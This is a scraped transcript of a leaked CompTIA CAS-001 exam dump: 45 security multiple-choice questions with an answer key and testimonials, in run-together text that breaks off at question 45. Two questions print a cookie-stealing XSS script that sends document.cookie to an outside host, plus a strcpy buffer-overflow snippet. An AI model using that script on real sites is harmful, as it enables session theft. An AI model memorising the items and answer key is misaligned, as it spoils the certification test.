comptia.actualtests.cas-001.v2015-03-30.by.hiroshi · 2015. 3. 30. · comptia cas-001 exam a...

300
http://www.gratisexam.com/ ActualTest.CAS-001_495.Q&A Number : CAS-001 Passing Score : 800 Time Limit : 120 min File Version : 22.01 http://www.gratisexam.com/ Tip just read the questions carefully and you will make it... Thanks for this dump, it is a good guide.. Pretty much all the questions we study that may have multiple answers, no answer is in doubt, I got on the test. Used the new actual test file that has been published and achieve the high scores in ypur exams. The questions in the dump are fantastic, the test will take different versions of the questions and display the answers differently.

Upload: others

Post on 22-Mar-2021

1 views

Category:

Documents


0 download

TRANSCRIPT

Page 1: CompTIA.Actualtests.CAS-001.v2015-03-30.by.Hiroshi · 2015. 3. 30. · CompTIA CAS-001 Exam A company currently does not use any type of authentication or authorization service for

http://www.gratisexam.com/

ActualTest.CAS-001_495.Q&A

Number: CAS-001Passing Score: 800Time Limit: 120 minFile Version: 22.01

http://www.gratisexam.com/

Tip just read the questions carefully and you will make it... Thanks for this dump, it is a good guide..

Pretty much all the questions we study that may have multiple answers, no answer is in doubt, I got on the test.

Used the new actual test file that has been published and achieve the high scores in ypur exams.

The questions in the dump are fantastic, the test will take different versions of the questions and display the answers differently.

Page 2: CompTIA.Actualtests.CAS-001.v2015-03-30.by.Hiroshi · 2015. 3. 30. · CompTIA CAS-001 Exam A company currently does not use any type of authentication or authorization service for

http://www.gratisexam.com/

Any questions/info you can recall are on the VCEs. So the preparation of exam is very easy.

Page 3: CompTIA.Actualtests.CAS-001.v2015-03-30.by.Hiroshi · 2015. 3. 30. · CompTIA CAS-001 Exam A company currently does not use any type of authentication or authorization service for

http://www.gratisexam.com/

Exam A

QUESTION 1A security audit has uncovered a lack of security controls with respect to employees' network account management. Specifically, the audit reveals that employee'snetwork accounts are not disabled in a timely manner once an employee departs the organization. The company policy states that the network account of anemployee should be disabled within eight hours of termination. However, the audit shows that 5% of the accounts were not terminated until three days after adismissed employee departs. Furthermore, 2% of the accounts are still active.

Which of the following is the BEST course of action that the security officer can take to avoid repeat audit findings?

A. Review the HR termination process and ask the software developers to review the identity management code.B. Enforce the company policy by conducting monthly account reviews of inactive accounts.C. Review the termination policy with the company managers to ensure prompt reporting of employee terminations.D. Update the company policy to account for delays and unforeseen situations in account deactivation.

Correct Answer: CSection: (none)Explanation

Explanation/Reference:

QUESTION 2Which of the following is true about an unauthenticated SAMLv2 transaction?

A. The browser asks the SP for a resource. The SP provides the browser with an XHTML format.The browser asks the IdP to validate the user, and then provides the XHTML back to the SP for access.

B. The browser asks the IdP for a resource. The IdP provides the browser with an XHTML format.The browser asks the SP to validate the user, and then provides the XHTML to the IdP for access.

C. The browser asks the IdP to validate the user. The IdP sends an XHTML form to the SP and a cookie to the browser. The browser asks for a resource to theSP, which verifies the cookie and XHTML format for access.

D. The browser asks the SP to validate the user. The SP sends an XHTML form to the IdP. The IdP provides the XHTML form back to the SP, and then thebrowser asks the SP for a resource.

Correct Answer: ASection: (none)Explanation

Explanation/Reference:

Page 4: CompTIA.Actualtests.CAS-001.v2015-03-30.by.Hiroshi · 2015. 3. 30. · CompTIA CAS-001 Exam A company currently does not use any type of authentication or authorization service for

http://www.gratisexam.com/

QUESTION 3A company which manufactures ASICs for use in an IDS wants to ensure that the ASICs' code is not prone to buffer and integer overflows. The ASIC technology iscopyrighted and the confidentiality of the ASIC code design is exceptionally important. The company is required to conduct internal vulnerability testing as well astesting by a third party.

Which of the following should be implemented in the SDLC to achieve these requirements?

A. Regression testing by the manufacturer and integration testing by the third partyB. User acceptance testing by the manufacturer and black box testing by the third partyC. Defect testing by the manufacturer and user acceptance testing by the third partyD. White box unit testing by the manufacturer and black box testing by the third party

Correct Answer: DSection: (none)Explanation

Explanation/Reference:

QUESTION 4The security administrator is receiving numerous alerts from the internal IDS of a possible Conficker infection spreading through the network via the Windows filesharing services. Given the size of the company which deploys over 20,000 workstations and 1,000 servers, the security engineer believes that the best course ofaction is to block the file sharing service across the organization by placing ACLs on the internal routers.

Which of the following should the security administrator do before applying the ACL?

A. Quickly research best practices with respect to stopping Conficker infections and implement the solution.B. Consult with the rest of the security team and get approval on the solution by all the team members and the team manager.C. Apply the ACL immediately since this is an emergency that could lead to a widespread data compromise.D. Call an emergency change management meeting to ensure the ACL will not impact core business functions.

Correct Answer: DSection: (none)Explanation

Explanation/Reference:answer is corrected.

QUESTION 5

Page 5: CompTIA.Actualtests.CAS-001.v2015-03-30.by.Hiroshi · 2015. 3. 30. · CompTIA CAS-001 Exam A company currently does not use any type of authentication or authorization service for

http://www.gratisexam.com/

Real 9CompTIA CAS-001 ExamA company currently does not use any type of authentication or authorization service for remote access. The new security policy states that all remote access mustbe locked down to only authorized personnel. The policy also dictates that only authorized external networks will be allowed to access certain internal resources.

Which of the following would MOST likely need to be implemented and configured on the company's perimeter network to comply with the new security policy?(Select TWO).

A. VPN concentratorB. FirewallC. Proxy serverD. WAPE. Layer 2 switch

Correct Answer: ABSection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 6Which of the following displays an example of a buffer overflow attack?

http://www.gratisexam.com/

A. <SCRIPT>document.location='http://site.comptia/cgi-bin/script.cgi?'+document.cookie </SCRIPT>

B. Checksums-Sha1:7be9e9bac3882beab1abb002bb5cd2302c76c48d 1157 xfig_3.2.5.b-1.dsc e0e3c9a9df6fac8f1536c2209025577edb1d1d9e 5770796xfig_3.2.5.b.orig.tar.gz d474180fbeb6955e79bfc67520ad775a87b68d80 46856 xfig_3.2.5.b-1.diff.gz ddcba53dffd08e5d37492fbf99fe93392943c7b0 3363512xfig-doc_3.2.5.b-1_all.deb 7773821c1a925978306d6c75ff5c579b018a2ac6 1677778 xfig-libs_3.2.5.b-1_all.deb b26c18cfb2ee2dc071b0e3bed6205c1fc0655022739228 xfig_3.2.5.b-1_amd64.deb

C. #include

Page 6: CompTIA.Actualtests.CAS-001.v2015-03-30.by.Hiroshi · 2015. 3. 30. · CompTIA CAS-001 Exam A company currently does not use any type of authentication or authorization service for

http://www.gratisexam.com/

char *code = "AAAABBBBCCCCDDD"; //including the character '\0' size = 16 bytes void main(){char buf[8];strcpy(buf, code);}

D. <form action="/cgi-bin/login" method=post>Username: <input type=text name=username>PassworD. <input type=password name=password><input type=submit value=Login>

Correct Answer: CSection: (none)Explanation

Explanation/Reference:

QUESTION 7Which of the following displays an example of a XSS attack?

A. <SCRIPT>document.location='http://site.comptia/cgi-bin/script.cgi?'+document.cookie </SCRIPT>

B. Checksums-Sha1:7be9e9bac3882beab1abb002bb5cd2302c76c48d 1157 xfig_3.2.5.b-1.dsc e0e3c9a9df6fac8f1536c2209025577edb1d1d9e 5770796xfig_3.2.5.b.orig.tar.gz d474180fbeb6955e79bfc67520ad775a87b68d80 46856 xfig_3.2.5.b-1.diff.gz ddcba53dffd08e5d37492fbf99fe93392943c7b0 3363512xfig-doc_3.2.5.b-1_all.deb 7773821c1a925978306d6c75ff5c579b018a2ac6 1677778 xfig-libs_3.2.5.b-1_all.deb b26c18cfb2ee2dc071b0e3bed6205c1fc0655022739228 xfig_3.2.5.b-1_amd64.deb

C. <form action="/cgi-bin/login" method=post>Username: <input type=text name=username>PassworD. <input type=password name=password><input type=submit value=Login>

D. #includechar *code = "AAAABBBBCCCCDDD"; //including the character '\0' size = 16 bytes void main(){char buf[8];strcpy(buf, code);}

Correct Answer: ASection: (none)Explanation

Explanation/Reference:

Page 7: CompTIA.Actualtests.CAS-001.v2015-03-30.by.Hiroshi · 2015. 3. 30. · CompTIA CAS-001 Exam A company currently does not use any type of authentication or authorization service for

http://www.gratisexam.com/

Explanation:

QUESTION 8Several critical servers are unresponsive after an update was installed. Other computers that have not yet received the same update are operational, but arevulnerable to certain buffer overflow attacks. The security administrator is required to ensure all systems have the latest updates while minimizing any downtime.

Which of the following is the BEST risk mitigation strategy to use to ensure a system is properly updated and operational?

A. Distributed patch management system where all systems in production are patched as updates are released.Real 11CompTIA CAS-001 Exam

B. Central patch management system where all systems in production are patched by automatic updates as they are released.C. Central patch management system where all updates are tested in a lab environment after being installed on a live production system.D. Distributed patch management system where all updates are tested in a lab environment prior to being installed on a live production system.

Correct Answer: DSection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 9A business is currently in the process of upgrading its network infrastructure to accommodate a personnel growth of over fifty percent within the next six months. Allpreliminary planning has been completed and a risk assessment plan is being adopted to decide which security controls to put in place throughout each phase.

Which of the following risk responses is MOST likely being considered if the business is creating an SLA with a third party?

A. Accepting riskB. Mitigating riskC. Identifying riskD. Transferring risk

Correct Answer: DSection: (none)Explanation

Explanation/Reference:Explanation:

Page 8: CompTIA.Actualtests.CAS-001.v2015-03-30.by.Hiroshi · 2015. 3. 30. · CompTIA CAS-001 Exam A company currently does not use any type of authentication or authorization service for

http://www.gratisexam.com/

QUESTION 10Which of the following must be taken into consideration for e-discovery purposes when a legal case is first presented to a company?

A. Data ownership on all filesB. Data size on physical disksC. Data retention policies on only file serversD. Data recovery and storage

Correct Answer: DSection: (none)Explanation

Explanation/Reference:

QUESTION 11A company has purchased a new system, but security personnel are spending a great deal of time on system maintenance. A new third party vendor has beenselected to maintain and manage the company's system. Which of the following document types would need to be created before any work is performed?

http://www.gratisexam.com/

A. IOSB. ISAC. SLAD. OLA

Correct Answer: CSection: (none)Explanation

Explanation/Reference:Explanation:

Page 9: CompTIA.Actualtests.CAS-001.v2015-03-30.by.Hiroshi · 2015. 3. 30. · CompTIA CAS-001 Exam A company currently does not use any type of authentication or authorization service for

http://www.gratisexam.com/

QUESTION 12The security administrator of a small private firm is researching and putting together a proposal to purchase an IPS to replace an existing IDS. A specific brand andmodel has been selected, but the security administrator needs to gather various cost information for that product. Which of the following documents would performa cost analysis report and include information such as payment terms?

A. RFIB. RTOC. RFQD. RFC

Correct Answer: CSection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 13A security administrator of a large private firm is researching and putting together a proposal to purchase an IPS. The specific IPS type has not been selected, andthe security administrator needs to gather information from several vendors to determine a specific product. Which of the following documents would assist inchoosing a specific brand and model?

Real 13CompTIA CAS-001 Exam

A. RFCB. RTOC. RFQD. RFI

Correct Answer: DSection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 14Wireless users are reporting issues with the company's video conferencing and VoIP systems. The security administrator notices DOS attacks on the network thatare affecting the company's VoIP system (i.e. premature call drops and garbled call signals). The security administrator also notices that the SIP servers are

Page 10: CompTIA.Actualtests.CAS-001.v2015-03-30.by.Hiroshi · 2015. 3. 30. · CompTIA CAS-001 Exam A company currently does not use any type of authentication or authorization service for

http://www.gratisexam.com/

unavailable during these attacks. Which of the following security controls will MOST likely mitigate the VoIP DOS attacks on the network? (Select TWO).

A. Configure 802.11b on the networkB. Configure 802.1q on the networkC. Configure 802.11e on the networkD. Update the firewall managing the SIP serversE. Update the HIDS managing the SIP servers

Correct Answer: CDSection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 15A company has decided to use the SDLC for the creation and production of a new information system. The security administrator is training all users on how toprotect company information while using the new system, along with being able to recognize social engineering attacks. Senior Management must also formallyapprove of the system prior to it going live. In which of the following phases would these security controls take place?

A. Operations and MaintenanceB. ImplementationC. Acquisition and DevelopmentD. Initiation

Correct Answer: BSection: (none)Explanation

Explanation/Reference:

QUESTION 16A company contracts with a third party to develop a new web application to process credit cards. Which of the following assessments will give the company theGREATEST level of assurance for the web application?

A. Social EngineeringB. Penetration TestC. Vulnerability Assessment

Page 11: CompTIA.Actualtests.CAS-001.v2015-03-30.by.Hiroshi · 2015. 3. 30. · CompTIA CAS-001 Exam A company currently does not use any type of authentication or authorization service for

http://www.gratisexam.com/

D. Code Review

Correct Answer: DSection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 17As part of the testing phase in the SDLC, a software developer wants to verify that an application is properly handling user error exceptions. Which of the followingis the BEST tool or process for the developer use?

A. SRTM reviewB. FuzzerC. Vulnerability assessmentD. HTTP interceptor

Correct Answer: BSection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 18Which of the following is the MOST appropriate control measure for lost mobile devices?

A. Disable unnecessary wireless interfaces such as Bluetooth.B. Reduce the amount of sensitive data stored on the device.C. Require authentication before access is given to the device.D. Require that the compromised devices be remotely wiped.

Correct Answer: DSection: (none)Explanation

Explanation/Reference:Real 15

Page 12: CompTIA.Actualtests.CAS-001.v2015-03-30.by.Hiroshi · 2015. 3. 30. · CompTIA CAS-001 Exam A company currently does not use any type of authentication or authorization service for

http://www.gratisexam.com/

CompTIA CAS-001 Exam

Explanation:

QUESTION 19Which of the following is the MOST cost-effective solution for sanitizing a DVD with sensitive information on it?

A. Write over the dataB. Purge the dataC. Incinerate the DVDD. Shred the DVD

Correct Answer: DSection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 20A network engineer at Company ABC observes the following raw HTTP request:

GET /disp_reports.php?SectionEntered=57&GroupEntered=-1&report_type=alerts&to_date=01- 01-0101&Run=

Run&UserEntered=dsmith&SessionID=5f04189bc&from_date=31-10-2010&TypesEntered=1

HTTP/1.1

Host: test.example.net

Accept: */*

Accept-Language: en

Connection: close

Cookie: java14=1; java15=1; java16=1; js=1292192278001;

Which of the following should be the engineer's GREATEST concern?

A. The HTTPS is not being enforced so the system is vulnerable.

Page 13: CompTIA.Actualtests.CAS-001.v2015-03-30.by.Hiroshi · 2015. 3. 30. · CompTIA CAS-001 Exam A company currently does not use any type of authentication or authorization service for

http://www.gratisexam.com/

B. The numerical encoding on the session ID is limited to hexadecimal characters, making it susceptible to a brute force attack.Real 16CompTIA CAS-001 Exam

C. Sensitive data is transmitted in the URL.D. The dates entered are outside a normal range, which may leave the system vulnerable to a denial of service attack.

Correct Answer: CSection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 21Driven mainly by cost, many companies outsource computing jobs which require a large amount of processor cycles over a short duration to cloud providers. Thisallows the company to avoid a large investment in computing resources which will only be used for a short time.

Assuming the provisioned resources are dedicated to a single company, which of the following is the MAIN vulnerability associated with on-demand provisioning?

A. Traces of proprietary data which can remain on the virtual machine and be exploitedB. Remnants of network data from prior customers on the physical servers during a compute jobC. Exposure of proprietary data when in-transit to the cloud provider through IPSec tunnelsD. Failure of the de-provisioning mechanism resulting in excessive charges for the resources

Correct Answer: ASection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 22A security administrator needs a secure computing solution to use for all of the company's security audit log storage, and to act as a central server to executesecurity functions from. Which of the following is the BEST option for the server in this scenario?

A. A hardened Red Hat Enterprise Linux implementation running a software firewallB. Windows 7 with a secure domain policy and smartcard based authenticationC. A hardened bastion host with a permit all policy implemented in a software firewallD. Solaris 10 with trusted extensions or SE Linux with a trusted policy

Page 14: CompTIA.Actualtests.CAS-001.v2015-03-30.by.Hiroshi · 2015. 3. 30. · CompTIA CAS-001 Exam A company currently does not use any type of authentication or authorization service for

http://www.gratisexam.com/

Correct Answer: DSection: (none)Explanation

Explanation/Reference:Explanation:

Real 17CompTIA CAS-001 Exam

QUESTION 23After implementing port security, restricting all network traffic into and out of a network, migrating to IPv6, installing NIDS, firewalls, spam and application filters, asecurity administer is convinced that the network is secure. The administrator now focuses on securing the hosts on the network, starting with the servers.

Which of the following is the MOST complete list of end-point security software the administrator could plan to implement?

A. Anti-malware/virus/spyware/spam software, as well as a host based firewall and strong, two- factor authentication.B. Anti-virus/spyware/spam software, as well as a host based IDS, firewall, and strong three-factor authentication.C. Anti-malware/virus/spyware/spam software, as well as a host based firewall and biometric authentication.D. Anti-malware/spam software, as well as a host based firewall and strong, three-factor authentication.

Correct Answer: ASection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 24A security architect is assigned to a major software development project. The software development team has a history of writing bug prone, inefficient code, withmultiple security flaws in every release. The security architect proposes implementing secure coding standards to the project manager. The secure codingstandards will contain detailed standards for:

A. error handling, input validation, memory use and reuse, race condition handling, commenting, and preventing typical security problems.B. error prevention, requirements validation, memory use and reuse, commenting typical security problems, and testing code standards.C. error elimination, trash collection, documenting race conditions, peer review, and typical security problems.D. error handling, input validation, commenting, preventing typical security problems, managing customers, and documenting extra requirements.

Correct Answer: A

Page 15: CompTIA.Actualtests.CAS-001.v2015-03-30.by.Hiroshi · 2015. 3. 30. · CompTIA CAS-001 Exam A company currently does not use any type of authentication or authorization service for

http://www.gratisexam.com/

Section: (none)Explanation

Explanation/Reference:Explanation:

Real 18CompTIA CAS-001 Exam

QUESTION 25A number of security incidents have been reported involving mobile web-based code developed by a consulting company. Performing a root cause analysis, thesecurity administrator of the consulting company discovers that the problem is a simple programming error that results in extra information being loaded into thememory when the proper format is selected by the user. After repeating the process several times, the security administrator is able to execute unintentionalinstructions through this method. Which of the following BEST describes the problem that is occurring, a good mitigation technique to use to prevent futureoccurrences, and why it a security concern?

A. Problem: Cross-site scriptingMitigation Technique. Input validationSecurity Concern: Decreases the company's profits and cross-site scripting can enable malicious actors to compromise the confidentiality of networkconnections or interrupt the availability of the network.

B. Problem: Buffer overflowMitigation Technique: Secure coding standardsSecurity Concern: Exposes the company to liability buffer overflows and can enable malicious actors to compromise the confidentiality/availability of the data.

C. Problem: SQL injectionMitigation Technique: Secure coding standardsSecurity Concern: Exposes the company to liability SQL injection and can enable malicious actors to compromise the confidentiality of data or interrupt theavailability of a system.

D. Problem: Buffer overflowMitigation Technique: Output validationSecurity Concern: Exposing the company to public scrutiny buffer overflows can enable malicious actors to interrupt the availability of a system.

Correct Answer: BSection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 26A security administrator has been conducting a security assessment of Company XYZ for the past two weeks. All of the penetration tests and other assessmentshave revealed zero flaws in the systems at Company XYZ. However, Company XYZ reports that it has been the victim of numerous security incidents in the past six

Page 16: CompTIA.Actualtests.CAS-001.v2015-03-30.by.Hiroshi · 2015. 3. 30. · CompTIA CAS-001 Exam A company currently does not use any type of authentication or authorization service for

http://www.gratisexam.com/

months. In each of these incidents, the criminals have managed to exfiltrate large volumes of data from the secure servers at the company. Which of the followingtechniques should the investigation team consider in the next phase of their assessment in hopes of uncovering the attack vector the criminals used?

A. Vulnerability assessmentReal 19CompTIA CAS-001 Exam

B. Code reviewC. Social engineeringD. Reverse engineering

Correct Answer: CSection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 27A security manager at Company ABC, needs to perform a risk assessment of a new mobile device which the Chief Information Officer (CIO) wants to immediatelydeploy to all employees in the company. The product is commercially available, runs a popular mobile operating system, and can connect to IPv6 networkswirelessly. The model the CIO wants to procure also includes the upgraded 160GB solid state hard drive. The producer of the device will not reveal exact numbersbut experts estimate that over 73 million of the devices have been sold worldwide. Which of the following is the BEST list of factors the security manager shouldconsider while performing a risk assessment?

A. Ability to remotely wipe the devices, apply security controls remotely, and encrypt the SSD; the track record of the vendor in publicizing and correcting securityflaws in their products; predicted costs associated with maintaining, integrating and securing the devices.

B. Ability to remotely administer the devices, apply security controls remotely, and remove the SSD; the track record of the vendor in securely implementing IPv6with IPSec; predicted costs associated with securing the devices.

C. Ability to remotely monitor the devices, remove security controls remotely, and decrypt the SSD; the track record of the vendor in publicizing and preventingsecurity flaws in their products; predicted costs associated with maintaining, destroying and tracking the devices.

D. Ability to remotely sanitize the devices, apply security controls locally, encrypt the SSD; the track record of the vendor in adapting the open source operatingsystem to their platform; predicted costs associated with inventory management, maintaining, integrating and securing the devices.

Correct Answer: ASection: (none)Explanation

Explanation/Reference:Explanation:

Page 17: CompTIA.Actualtests.CAS-001.v2015-03-30.by.Hiroshi · 2015. 3. 30. · CompTIA CAS-001 Exam A company currently does not use any type of authentication or authorization service for

http://www.gratisexam.com/

QUESTION 28A newly-appointed risk management director for the IT department at Company XYZ, a major pharmaceutical manufacturer, needs to conduct a risk analysisregarding a new system which the developers plan to bring on-line in three weeks. The director begins by reviewing the thorough and well-written report from theindependent contractor who performed a security assessment of the

Real 20CompTIA CAS-001 Examsystem. The report details what seems to be a manageable volume of infrequently exploited security vulnerabilities. The likelihood of a malicious attacker exploitingone of the vulnerabilities is low; however, the director still has some reservations about approving the system because of which of the following?

A. The resulting impact of even one attack being realized might cripple the company financially.B. Government health care regulations for the pharmaceutical industry prevent the director from approving a system with vulnerabilities.C. The director is new and is being rushed to approve a project before an adequate assessment has been performed.D. The director should be uncomfortable accepting any security vulnerabilities and should find time to correct them before the system is deployed.

Correct Answer: ASection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 29A small company has a network with 37 workstations, 3 printers, a 48 port switch, an enterprise class router, and a firewall at the boundary to the ISP. Theworkstations have the latest patches and all have up-to-date anti-virus software. User authentication is a two-factor system with fingerprint scanners andpasswords. Sensitive data on each workstation is encrypted. The network is configured to use IPv4 and is a standard Ethernet network. The network also has acaptive portal based wireless hot-spot to accommodate visitors. Which of the following is a problem with the security posture of this company?

A. No effective controls in placeB. No transport security controls are implementedC. Insufficient user authentication controls are implementedD. IPv6 is not incorporated in the network

Correct Answer: BSection: (none)Explanation

Explanation/Reference:Explanation:

Page 18: CompTIA.Actualtests.CAS-001.v2015-03-30.by.Hiroshi · 2015. 3. 30. · CompTIA CAS-001 Exam A company currently does not use any type of authentication or authorization service for

http://www.gratisexam.com/

QUESTION 30Statement: "The system shall implement measures to notify system administrators prior to a security incident occurring."

Which of the following BEST restates the above statement to allow it to be implemented by a team

Real 21CompTIA CAS-001 Examof software developers?

A. The system shall cease processing data when certain configurable events occur.B. The system shall continue processing in the event of an error and email the security administrator the error logs.C. The system shall halt on error.D. The system shall throw an error when specified incidents pass a configurable threshold.

Correct Answer: DSection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 31A corporate executive lost their smartphone while on an overseas business trip. The phone was equipped with file encryption and secured with a strongpassphrase. The phone contained over 60GB of proprietary data. Given this scenario, which of the following is the BEST course of action?

A. File an insurance claim and assure the executive the data is secure because it is encrypted.B. Immediately implement a plan to remotely wipe all data from the device.C. Have the executive change all passwords and issue the executive a new phone.D. Execute a plan to remotely disable the device and report the loss to the police.

Correct Answer: BSection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 32A user logs into domain A using a PKI certificate on a smartcard protected by an 8 digit PIN. The credential is cached by the authenticating server in domain A.Later, the user attempts to access a resource in domain B. This initiates a request to the original authenticating server to somehow attest to the resource server in

Page 19: CompTIA.Actualtests.CAS-001.v2015-03-30.by.Hiroshi · 2015. 3. 30. · CompTIA CAS-001 Exam A company currently does not use any type of authentication or authorization service for

http://www.gratisexam.com/

the second domain that the user is in fact who they claim to be.

Which of the following is being described?

A. AuthenticationB. AuthorizationC. SAMLD. Kerberos

Correct Answer: CSection: (none)Explanation

Explanation/Reference:Real 22CompTIA CAS-001 Exam

Explanation:

QUESTION 33A certain script was recently altered by the author to meet certain security requirements, and needs to be executed on several critical servers. Which of thefollowing describes the process of ensuring that the script being used was not altered by anyone other than the author?

A. Digital encryptionB. Digital signingC. Password entropyD. Code signing

Correct Answer: DSection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 34A company has asked their network engineer to list the major advantages for implementing a virtual environment in regards to cost. Which of the following wouldMOST likely be selected?

Page 20: CompTIA.Actualtests.CAS-001.v2015-03-30.by.Hiroshi · 2015. 3. 30. · CompTIA CAS-001 Exam A company currently does not use any type of authentication or authorization service for

http://www.gratisexam.com/

A. Ease of patch testingB. Reducing physical footprintC. Reduced network trafficD. Isolation of applications

Correct Answer: BSection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 35The security administrator has been tasked with providing a solution that would not only eliminate the need for physical desktops, but would also centralize thelocation of all desktop applications, without losing physical control of any network devices. Which of the following would the security manager MOST likelyimplement?

A. VLANsB. VDI

Real 23CompTIA CAS-001 Exam

C. PaaSD. IaaS

Correct Answer: BSection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 36A company has decided to relocate and the security manager has been tasked to perform a site survey of the new location to help in the design of the physicalinfrastructure. The current location has video surveillance throughout the building and entryways.

The following requirements must be met:

- Able to log entry of all employees in and out of specific areas- Access control into and out of all sensitive areas- Tailgating prevention

Page 21: CompTIA.Actualtests.CAS-001.v2015-03-30.by.Hiroshi · 2015. 3. 30. · CompTIA CAS-001 Exam A company currently does not use any type of authentication or authorization service for

http://www.gratisexam.com/

Which of the following would MOST likely be implemented to meet the above requirements and provide a secure solution? (Select TWO).

A. Discretionary Access controlB. Man trapC. Visitor logsD. Proximity readersE. Motion detection sensors

Correct Answer: BDSection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 37Which of the following refers to programs running in an isolated space to run untested code and prevents the code from making permanent changes to the OSkernel and other data on the host machine?

A. Input ValidationB. Application hardeningC. Code signingD. Application sandboxing

Real 24CompTIA CAS-001 Exam

Correct Answer: DSection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 38The company is about to upgrade a financial system through a third party, but wants to legally ensure that no sensitive information is compromised throughout theproject. The project manager must also make sure that internal controls are set to mitigate the potential damage that one individual's actions may cause. Which ofthe following needs to be put in place to make certain both organizational requirements are met? (Select TWO).

Page 22: CompTIA.Actualtests.CAS-001.v2015-03-30.by.Hiroshi · 2015. 3. 30. · CompTIA CAS-001 Exam A company currently does not use any type of authentication or authorization service for

http://www.gratisexam.com/

A. Separation of dutiesB. Forensic tasksC. MOUD. OLAE. NDAF. Job rotation

Correct Answer: AESection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 39The security administrator is worried about possible SPIT attacks against the VoIP system.

Which of the following security controls would MOST likely need to be implemented to detect this type of attack?

A. SIP and SRTP traffic analysisB. QoS audit on Layer 3 devicesC. IP and MAC filtering logsD. Email spam filter log

Correct Answer: ASection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 40The helpdesk is receiving multiple calls about slow and intermittent Internet access from the

Real 25CompTIA CAS-001 Examfinance department. The network administrator reviews the tickets and compiles the following information for the security administrator:

------

Page 23: CompTIA.Actualtests.CAS-001.v2015-03-30.by.Hiroshi · 2015. 3. 30. · CompTIA CAS-001 Exam A company currently does not use any type of authentication or authorization service for

http://www.gratisexam.com/

Caller 1, IP 172.16.35.217, NETMASK 255.255.254.0

Caller 2, IP 172.16.35.53, NETMASK 255.255.254.0

Caller 3, IP 172.16.35.173, NETMASK 255.255.254.0

All callers are connected to the same switch and are routed by a router with five built-in interfaces. The upstream router interface's MAC is 00-01-42-32-ab-1a

------

The security administrator brings a laptop to the finance office, connects it to one of the wall jacks, starts up a network analyzer, and notices the following:

09:05:10.937590 arp reply 172.16.34.1 is-at 0:12:3f:f1:da:52 (0:12:3f:f1:da:52)

09:05:15.934840 arp reply 172.16.34.1 is-at 0:12:3f:f1:da:52 (0:12:3f:f1:da:52)

09:05:19.931482 arp reply 172.16.34.1 is-at 0:12:3f:f1:da:52 (0:12:3f:f1:da:52)

Which of the following can the security administrator determine from the above information?

A. A man in the middle attack is underway - implementing static ARP entries is a possible solution.B. An ARP flood attack targeted at the router is causing intermittent communication implementing IPS is a possible solution.C. The default gateway is being spoofed - implementing static routing with MD5 is a possible solution.D. The router is being advertised on a separate network - router reconfiguration is a possible solution.

Correct Answer: ASection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 41On Monday, the Chief Information Officer (CIO) of a state agency received an e-discovery request for the release of all emails sent and received by the agencyboard of directors for the past five years. The CIO has contacted the email administrator and asked the administrator to provide the requested information by end ofday on Friday. Which of the following has the GREATEST impact on the ability to fulfill the e-discovery request?

Real 26CompTIA CAS-001 Exam

Page 24: CompTIA.Actualtests.CAS-001.v2015-03-30.by.Hiroshi · 2015. 3. 30. · CompTIA CAS-001 Exam A company currently does not use any type of authentication or authorization service for

http://www.gratisexam.com/

A. Data retention policyB. Backup software and hardwareC. Email encryption softwareD. Data recovery procedures

Correct Answer: ASection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 42A company is evaluating a new marketing strategy involving the use of social networking sites to reach its customers. The marketing director wants to be able toreport important company news, product updates, and special promotions on the social websites.

After an initial and successful pilot period, other departments want to use the social websites to post their updates as well.

The Chief Information Officer (CIO) has asked the company security administrator to document three negative security impacts of allowing IT staff to post workrelated information on such websites.

Which of the following are the major risks the security administrator should report back to the CIO? (Select THREE).

A. Brute force attacksB. Malware infectionC. DDOS attacksD. Phishing attacksE. SQL injection attacksF. Social engineering attacks

Correct Answer: BDFSection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 43A telecommunication company has recently upgraded their teleconference systems to multicast. Additionally, the security team has instituted a new policy which

Page 25: CompTIA.Actualtests.CAS-001.v2015-03-30.by.Hiroshi · 2015. 3. 30. · CompTIA CAS-001 Exam A company currently does not use any type of authentication or authorization service for

http://www.gratisexam.com/

requires VPN to access the company's video conference. All parties must be issued a VPN account and must connect to the company's VPN concentrator toparticipate in the remote meetings.

Real 27CompTIA CAS-001 ExamWhich of the following settings will increase bandwidth utilization on the VPN concentrator during the remote meetings?

A. IPSec transport mode is enabledB. ICMP is disabledC. Split tunneling is disabledD. NAT-traversal is enabled

Correct Answer: CSection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 44An Information Security Officer (ISO) has asked a security team to randomly retrieve discarded computers from the warehouse dumpster. The security team wasable to retrieve two older computers and a broken MFD network printer. The security team was able to connect the hard drives from the two computers and thenetwork printer to a computer equipped with forensic tools. The security team was able to retrieve PDF files from the network printer hard drive but the data on thetwo older hard drives was inaccessible.

Which of the following should the Warehouse Manager do to remediate the security issue?

A. Revise the hardware and software maintenance contract.B. Degauss the printer hard drive to delete data.C. Implement a new change control process.D. Update the hardware decommissioning procedures.

Correct Answer: DSection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 45

Page 26: CompTIA.Actualtests.CAS-001.v2015-03-30.by.Hiroshi · 2015. 3. 30. · CompTIA CAS-001 Exam A company currently does not use any type of authentication or authorization service for

http://www.gratisexam.com/

Which of the following precautions should be taken to harden network devices in case of VMEscape?

